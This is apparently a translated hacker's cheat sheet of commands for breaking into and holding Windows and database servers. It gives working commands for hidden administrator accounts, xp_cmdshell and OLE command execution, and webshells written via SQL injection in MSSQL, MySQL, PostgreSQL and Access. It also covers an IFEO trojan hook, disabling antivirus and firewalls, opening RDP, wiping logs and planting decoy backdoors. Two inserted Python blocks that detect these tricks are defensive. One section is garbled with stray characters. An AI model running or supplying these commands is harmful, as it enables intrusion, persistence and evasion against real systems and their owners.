1. net user administrator /passwordreq:no
This means "the administrator account does not require a password". If it executes successfully, the administrator password can be left blank when logging in over 3389 and you log straight in; once inside, restore it with net user administrator /passwordreq:yes.
2. A rather neat way to build a clone account
First create a user-level account,
then export its registry key, then delete the account in Computer Management,
then re-import the key and add the account to the administrators group.
3. Reading the Radmin password
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg
4. [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options]
Create a subkey named "services.exe",
then under it create a string value
whose data is the full path of the trojan.
5. runas /user:guest cmd
Tests the user's privileges.
6. tlntadmn config sec = -ntlm
exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'--
This simply makes use of the tlntadmn command; for the details run it with /? and have a look. (This one needs administrator privileges.) Creating an identical user so that NTLM authentication passes needs no explanation, does it?
7. Post-intrusion patching, trace cleaning and backdoor placement:
Basic holes must be patched, e.g. SU privilege escalation and SA injection. For DBO injection consider killing xp_treelist and xp_regread, and make a note of the web directory yourself. You must remember to clean up your traces. For SQL Server connections it is better to use Enterprise Manager; Query Analyzer leaves records under HKEY_CURRENT_USER\Software\Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers, so delete them. When clearing IIS logs, do not use an AIO-type tool that wipes the logs completely; choose a logcleaner-type tool that deletes only the access records of a specified IP. If you can capture the administrator's password via gina, log in as them to clean the logs and do the final trace cleanup with WYWZ. That said, manual cleanup is safer. Finally leave behind a backdoor that produces no log entries. Several one-line backdoors, a standard backdoor and a cfm backdoor are the minimum I usually leave. Remember to modify the timestamps. One more rather ruthless trick: if the machine is just an ordinary zombie, drop a TXT file on the administrator's desktop telling them you broke in, planted a certain backdoor and added a certain user (not your real important backdoor, of course), and ask them to clean it up. That way there is a good chance your real backdoor survives.
8. declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c <command>'

For example:
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'

declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators aptime /add'
9. MSSQL Server 2005 has xp_cmdshell turned off by default.
To enable it you have to switch it on through the advanced options;
this can be injected directly at the injection point:
id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then: ;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--
or
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
to restore cmdshell.
In Query Analyzer:
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
then: dbcc addextendedproc("xp_cmdshell","xplog70.dll")
10. A new way to restore xp_cmdshell
Once the extended stored procedures have been deleted there is a very simple way to restore them.
Deletion:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'

Restore:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")

This restores them directly, regardless of whether sp_addextendedproc still exists.
-----------------------------

Statement to delete the extended stored procedure xp_cmdshell:
exec sp_dropextendedproc 'xp_cmdshell'
SQL statement to restore cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

SQL statement to enable cmdshell:
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

Check whether the extended procedure exists:
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is OK.

Restore xp_cmdshell:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
A result of 1 means it is OK.

Otherwise upload xplog70.dll:
exec master.dbo.sp_addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'

SQL statement to block cmdshell:
sp_dropextendedproc 'xp_cmdshell'
--------------------------
Clearing the 3389 login records with a command that ships with the system:
reg delete "hkcu\Software\Microsoft\Terminal Server Client" /f

Then delete the Default.rdp file in the current account's My Documents folder.
Checking the current user's privileges in MySQL:
show grants for
The following statements give privileges identical to the ROOT user. Everyone has run into this when taking a site: the MySQL root user may only connect locally and refuses external connections. The method below solves that. The statements create a user itpro with password 123 and privileges identical to root, allowed to connect from any host, so you can conveniently operate the database remotely from your own machine.

Create USER 'itpro'@'%' IDENTIFIED BY '123';
GRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;

When you are done, remember to remove your footprints.

Drop USER 'itpro'@'%';
Drop DATABASE IF EXISTS `itpro`;
Getting SYSTEM privileges as the current user:
sc Create SuperCMD binPath= "cmd /K start" type= own type= interact
sc start SuperCMD
Program code
<SCRIPT LANGUAGE="VBScript">
set wsnetwork=CreateObject("WSCRIPT.NETWORK")
os="WinNT://"&wsnetwork.ComputerName
Set ob=GetObject(os)
Set oe=GetObject(os&"/Administrators,group")
Set od=ob.Create("user","nosec")
od.SetPassword "123456abc!@#"
od.SetInfo
Set of=GetObject(os&"/nosec,user")
oe.add os&"/nosec"
</Script>
<script language=javascript>window.close();</script>
Getting into the backend past a CAPTCHA restriction to grab a shell
Program code
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security]
"BlockXBM"=dword:00000000

Save this as code.reg, import it into the registry and restart IE;
that is all it takes.
Writing a shell with union
Program code
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*

Applied to the dedecms injection vulnerability, this writes a shell without backend access.
In the dedecms backend, when there is no file manager and no outfile privilege:
under Plugin Management -> Virus Scan
write a one-liner into include/config_hand.php
Program code
>';?><?php @eval($_POST[cmd]);?>

in the format above.
In Oracle, after logging in as a low-privileged user, run the following statement to query the hashes of sys and other users, then crack them with Cain.
Program code
select username,password from dba_users;
MySQL remote-connection user
Program code
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
echo y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0
1. Querying the Terminal Services port

XP & 2003: REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber

Generic: regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp"
type tsp.reg
2. Enabling Terminal Services on XP & 2003

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
3. Changing the Terminal Services port to 20008 (0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
4. Removing the XP & 2003 firewall restriction on Terminal Services port 3389 and on connecting IPs
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@xpsp2res.dll,-22009 /f
5. Enabling the Win2000 terminal on port 3389 (requires a reboot)

echo Windows Registry Editor Version 5.00 >2000.reg
echo. >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg
echo "Enabled"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg
echo "ShutdownWithoutLogon"="0" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
echo "EnableAdminTSRemote"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg
echo "TSEnabled"=dword:00000001 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
echo "Start"=dword:00000002 >>2000.reg
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg
echo "Hotkey"="1" >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
echo "PortNumber"=dword:00000D3D >>2000.reg
6. Forcibly rebooting Win2000 & Win2003 (the system reboots automatically after the last line runs)
@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >> restart.inf
echo [defaultinstall] >> restart.inf
rundll32 setupapi,%inf% 1 %temp%\restart.inf
7. Disabling TCP/IP port filtering (requires a reboot)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
8. When the terminal has exceeded its maximum number of connections, you can connect with:
mstsc /v:ip:3389 /console
4 \, A5 o: U3 K+ x% q4 R9.调整NTFS分区权限
+ O+ K; E# _/ }& Q' L4 q, B/ s$ m5 p* F
cacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)1 E6 X: S0 G" T5 l
/ t, o* j" g! E A" ecacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)) Z; S _1 u6 l6 O/ A
9 G I# i6 v$ T
------------------------------------------------------
3389.vbs
On Error Resume Next
const HKEY_LOCAL_MACHINE = &H80000002
strComputer = "."
Set StdOut = WScript.StdOut
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_
strComputer & "\root\default:StdRegProv")
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
Set R = CreateObject("WScript.Shell")
R.run("Shutdown.exe -f -r -t 0")
Deleting the awgina.dll registry value
Program code
reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f

Program code
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash
Set it to 1 to disable LM hash storage.
Database security: common commands for attacking an Oracle database
Recently I came across a server running an Oracle database; after cramming Oracle and consulting some experts I finally got hold of every user password for the site's backend management interface. I found Oracle really cumbersome to operate, so to save you some detours I have collected the commands needed during the intrusion.
1. su – oracle: not required; useful when you do not have the DBA password, since it lets you enter the sqlplus interface without a password.
2. sqlplus /nolog, or sqlplus system/manager, or ./sqlplus system/manager@ora9i;
3. SQL>connect / as sysdba; (as sysoper) or
connect internal/oracle AS SYSDBA; (scott/tiger)
conn sys/change_on_install as sysdba;
4. SQL>startup; starts the database instance
5. View all current databases: select * from v$database;
select name from v$database;
6. desc v$database; view the database structure fields
7. How to see which users hold SYSDBA/SYSOPER privileges:
SQL>select * from V_$PWFILE_USERS;
Show user; shows the currently connected database user
8. Enter the test database: database test;
9. View all database instances: select * from v$instance;
e.g. ora9i
10. View all tables in the current database:
SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_
11. View a table's structure: desc all_tables;
12. Show the complete field structure of CQI.T_BBS_XUSER:
desc CQI.T_BBS_XUSER;
13. Get the records in the CQI.T_BBS_XUSER table:
select * from CQI.T_BBS_XUSER;
14. Add a database user (test11/test):
create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;
15. Grant privileges to the user:
grant connect,resource,dba to test11;
grant sysdba to test11;
commit;
16. Change database users' passwords (set the sys and system passwords to test):
alter user sys identified by test;
alter user system identified by test;
applicationContext-util.xml
applicationContext.xml
struts-config.xml
web.xml
server.xml
tomcat-users.xml
hibernate.cfg.xml
database_pool_config.xml

\WEB-INF\classes\hibernate.cfg.xml   database connection configuration
\WEB-INF\server.xml   similar to http.conf + mysql.ini + php.ini
\WEB-INF\struts-config.xml   file and directory structure
spring.properties contains the name of the hibernate.cfg.xml file

C:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml
If none of these can be found, have a look at the class files.
Viewing the shared folders inside a virtual machine:
run this in cmd inside the virtual machine:
\\.host\Shared Folders
Finding the terminal port from cmdshell
Finding the terminal:
Step 1: Tasklist /SVC lists all processes, system services and their corresponding PIDs;
the service corresponding to the terminal is named TermService.
Step 2: use netstat -ano to list the PID that owns each port;
find the port that corresponds to that PID.
Querying the password hashes in SQL Server 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
Complete code for adding a user through MySQL on a Chinese-language operating system:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
drop table a;

English-language version:

use test;
create table a (cmd text);
insert into a values ("set wshshell=createobject (""wscript.shell"") " );
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
drop table a;

create table a (cmd BLOB);
insert into a values (CONVERT(<hex code of the trojan>,CHAR));
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\mm.exe';
drop table a;
A note on how to deal with that awkward Norton
View the path of the Norton service:
sc qc ccSetMgr
Then set permissions to deny access. Go all the way:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone
Then reboot the server:
iisreset /reboot
That does it. But when you are finished, remember to restore the permissions:
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin

EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
Some notes on PostgreSQL injection
How to get a webshell
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
How to read a file
http://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
http://127.0.0.1/postgresql.php?id=1;copy myfile from '/etc/passwd';
http://127.0.0.1/postgresql.php?id=1;select * from myfile;

There are two ways to execute commands: one needs a custom libc-backed function, the other uses pl/python.
Of course, the PostgreSQL version must be above 8.x for these.
Create a system function:
CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT

Create an output table:
CREATE TABLE stdout(id serial, system_out text)

Run the shell command, sending its output to a file for the output table:
SELECT system('uname -a > /tmp/test')

Copy the output into the table:
COPY stdout(system_out) FROM '/tmp/test'

Read the output back from the table to see whether execution succeeded:
SELECT system_out FROM stdout
Below is a test example:

/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --

/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --

/store.php?id=1; SELECT system('uname -a > /tmp/test') --

/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --

/store.php?id=1 UNION ALL SELECT NULL,(SELECT system_out FROM stdout ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
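The MSSQL, MySQL and PostgreSQL statements collected on this page, including the split-string form EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ...'), are what a database-side detection rule has to recognise. The Python below is an added example and not code from the original post: it normalises query text (URL decoding, joining split literals, unwrapping EXEC('...')) and then applies rules for the patterns shown above over a constructed list of sample statements; the rule names are my own.

```python
"""Flag SQL statements that match the command-execution and file-write tricks
collected on this page (MSSQL xp_cmdshell / OLE automation / extended-procedure
re-registration, MySQL INTO OUTFILE, PostgreSQL COPY and C-language functions).

Added example, not from the original post. The rule names are constructed here.
"""
import re
from typing import Dict, List
from urllib.parse import unquote

RULES: Dict[str, str] = {
    "mssql_xp_cmdshell":     r"\bxp_cmdshell\b",
    "mssql_ole_automation":  r"\bsp_oa(create|method)\b",
    "mssql_enable_advanced": r"sp_configure\s*'(show advanced options|xp_cmdshell)'\s*,\s*1",
    "mssql_readd_extproc":   r"(dbcc\s+addextendedproc|\bsp_addextendedproc\b)",
    "mssql_fs_enum":         r"\bxp_(dirtree|regread)\b",
    "mysql_file_write":      r"\binto\s+(outfile|dumpfile)\b",
    "pgsql_copy_file":       r"\bcopy\s+\w+(\s*\([^)]*\))?\s+(to|from)\s+",
    "pgsql_c_function":      r"\bcreate\s+function\b.*\blanguage\s+'?c\b",
    "webshell_marker":       r"(<\?php\s+@?eval\s*\(|<%\s*(eval|execute)\s*\(?\s*request)",
}

_CONCAT = re.compile(r"'\s*\+\s*'")                               # 'ma'+'ster' -> 'master'
_EXEC_STR = re.compile(r"exec\s*\(\s*'(.*)'\s*\)", re.I | re.S)   # EXEC('...') -> ...
_WS = re.compile(r"\s+")


def normalize(stmt: str) -> str:
    """Undo the cheap evasions seen on this page before matching."""
    s = unquote(stmt)              # %20 and friends from payloads injected via URLs
    s = _CONCAT.sub("", s)         # join string literals split with '+'
    s = _EXEC_STR.sub(r"\1", s)    # unwrap dynamic SQL so the inner text is scanned
    return _WS.sub(" ", s).strip().lower()


def scan(stmt: str) -> List[str]:
    """Return the names of all rules the (normalised) statement matches."""
    norm = normalize(stmt)
    return [name for name, pat in RULES.items() if re.search(pat, norm, re.S)]


def scan_log(stmts: List[str]) -> Dict[str, List[str]]:
    """Map each flagged statement to its rule hits; clean statements are omitted."""
    return {s: hits for s in stmts if (hits := scan(s))}


# Constructed sample statements, standing in for an application or query log.
SAMPLE_QUERIES: List[str] = [
    "SELECT id, title FROM posts WHERE id = 5",
    "EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')",
    "id=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;"
    "EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--",
    'dbcc addextendedproc ("xp_cmdshell","xplog70.dll")',
    "declare @shell int exec sp_oacreate 'wscript.shell',@shell output "
    "exec sp_oamethod @shell,'run',null,'cmd.exe /c whoami'",
    'select * from a into outfile "C:\\\\Documents and Settings\\\\All Users\\\\Start Menu\\\\Programs\\\\Startup\\\\a.vbs"',
    "1;copy%20t(c)%20to%20$$/tmp/test.php$$;",
    "1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C' STRICT --",
    "1' union select 1,2,'<?php eval($_POST[cmd])?>',4 into outfile 'D:\\\\wwwroot\\\\x.php' /*",
    "UPDATE users SET last_login = NOW() WHERE id = 7",
]

if __name__ == "__main__":
    for stmt, hits in scan_log(SAMPLE_QUERIES).items():
        print(f"{', '.join(hits):40s} {stmt[:70]}")
```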
net stop sharedaccess   stop the default firewall
netsh firewall show config   show the default firewall configuration
netsh firewall set notifications disable   disable the notification shown when a program is blocked by the default firewall
netsh firewall add allowedprogram c:\1.exe Svchost   add a program to the default firewall's allowed list
Changing the 3389 port (harder to pick up with a scanner once changed)
Change the port setting on the server side; two places in the registry need to be modified:

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp]
PortNumber value, default 3389; change it to the desired port, e.g. 6000

Second place:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
PortNumber value, default 3389; change it to the desired port, e.g. 6000

That is all; reboot the system and it takes effect.
A script to log 3389 remote logins
Save it as a bat file:
date /t >>D:\sec\TSlog\ts.log
time /t >>D:\sec\TSlog\ts.log
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
start Explorer
mstsc parameters:

Remote Desktop Connection
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
<Connection File> -- specifies the name of the .rdp file for the connection.
/v:<server[:port]> -- specifies the terminal server to connect to.
/console -- connects to the console session of the server.
/f -- starts the client in full-screen mode.
/w:<width> -- specifies the width of the remote desktop screen.
/h:<height> -- specifies the height of the remote desktop screen.
/edit -- opens the specified .rdp file for editing.
/migrate -- migrates legacy connection files created with Client Connection Manager to new .rdp connection files.

mstsc /console connects to session 0, whereas plain mstsc opens a separate virtual session, which amounts to a separate logon to the computer. In other words, a connection with the console parameter is the desktop shown on the monitor. Give it a try; it comes in handy sometimes, especially with some software that
mstsc /console /v:124.42.126.xxx   gets past the limit on the number of terminal connections
Enabling 3389 from the command line
net user asp.net aspnet /add
net localgroup Administrators asp.net /add
net localgroup "Remote Desktop Users" asp.net /add
attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
sc config rasman start= auto
sc config remoteaccess start= auto
net start rasman
net start remoteaccess
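The registry changes in this block, together with the Image File Execution Options entry, the GinaDLL value and NoLMHash mentioned earlier on the page, are exactly what a defender audits a host for. The Python below is an added example, not code from the original post: it parses a reg export-style .reg text (a constructed sample, not data from a real machine) and reports those settings; the key and value names are the ones this page uses, plus the Debugger value that the IFEO key itself uses, which the page does not name.

```python
"""Audit a Windows .reg export for the settings this page shows being changed.

Added example, not from the original post. Parses `reg export` / `regedit /e`
text and reports: RDP enabled, RDP listener moved off 3389, an IFEO debugger on a
system binary, a custom GinaDLL, LM hashes stored, hidden accounts, filters off.
"""
import re
from typing import Dict, List

RDP_DEFAULT_PORT = 0x0D3D  # 3389

# Constructed sample in `reg export` format; not captured from a real host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp]
"PortNumber"=dword:00004e28
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\services.exe]
"Debugger"="c:\\windows\\temp\\svc.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"GinaDLL"="awgina.dll"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa]
"NoLMHash"=dword:00000000
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList]
"asp.net"=dword:00000000
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]
"EnableSecurityFilters"=dword:00000001
'''

HKLM = "hkey_local_machine"
TS = HKLM + r"\system\currentcontrolset\control\terminal server"
WINLOGON = HKLM + r"\software\microsoft\windows nt\currentversion\winlogon"
IFEO = HKLM + r"\software\microsoft\windows nt\currentversion\image file execution options" + "\\"
LSA = HKLM + r"\system\currentcontrolset\control\lsa"
TCPIP = HKLM + r"\system\currentcontrolset\services\tcpip\parameters"

_VALUE = re.compile(r'^"(?P<name>[^"]*)"=(?P<data>.+)$')


def parse_reg(text: str) -> Dict[str, Dict[str, object]]:
    """Return {key_path: {value_name: data}}; dword data becomes int, strings str.

    Key paths and value names are lower-cased: registry lookups are case-insensitive.
    """
    keys: Dict[str, Dict[str, object]] = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            keys.setdefault(current, {})
            continue
        m = _VALUE.match(line)
        if current is None or not m:
            continue                     # header, @= defaults and hex continuations are skipped
        name, data = m.group("name").lower(), m.group("data")
        if data.startswith("dword:"):
            keys[current][name] = int(data[len("dword:"):], 16)
        elif len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            # .reg files escape backslashes and double quotes with a backslash
            keys[current][name] = data[1:-1].replace('\\"', '"').replace("\\\\", "\\")
        else:
            keys[current][name] = data   # other value types kept as raw text
    return keys


def audit(keys: Dict[str, Dict[str, object]]) -> List[str]:
    """Return one human-readable finding per indicator present in the export."""
    findings: List[str] = []
    if keys.get(TS, {}).get("fdenytsconnections") == 0:
        findings.append("RDP enabled: fDenyTSConnections=0 under Terminal Server")
    for sub in (r"\winstations\rdp-tcp", r"\wds\rdpwd\tds\tcp"):
        port = keys.get(TS + sub, {}).get("portnumber")
        if isinstance(port, int) and port != RDP_DEFAULT_PORT:
            leaf = sub.rsplit("\\", 1)[-1]
            findings.append(f"RDP listener on non-standard port {port} ({leaf})")
    for path, values in keys.items():
        if path.startswith(IFEO) and "debugger" in values:
            findings.append(f"IFEO debugger set for {path[len(IFEO):]}: {values['debugger']}")
    gina = keys.get(WINLOGON, {}).get("ginadll")
    if gina:
        findings.append(f"custom GINA registered: GinaDLL={gina}")
    if keys.get(LSA, {}).get("nolmhash") == 0:
        findings.append("LM hashes stored: NoLMHash=0")
    for name, data in keys.get(WINLOGON + r"\specialaccounts\userlist", {}).items():
        if data == 0:
            findings.append(f"account hidden from logon screen: {name}")
    if keys.get(TCPIP, {}).get("enablesecurityfilters") == 0:
        findings.append("TCP/IP port filtering disabled: EnableSecurityFilters=0")
    return findings


if __name__ == "__main__":
    for finding in audit(parse_reg(SAMPLE_REG)):
        print("[!]", finding)
```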
Media
<form id="frmUpload" enctype="multipart/form-data"
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
control userpasswords2   view the users' passwords
Exporting a shell directly from an Access database; prerequisites: table a exists in the Access database, and you know the site's real path.
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
141. When doing manual MSSQL injection, if you cannot write out via a reverse connection, most people read the records out one at a time, which is exhausting. Here is a single statement that reads out all the data:
Test 1:
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1

Test 2:
create table dirs(paths varchar(100),paths1 varchar(100), id int)

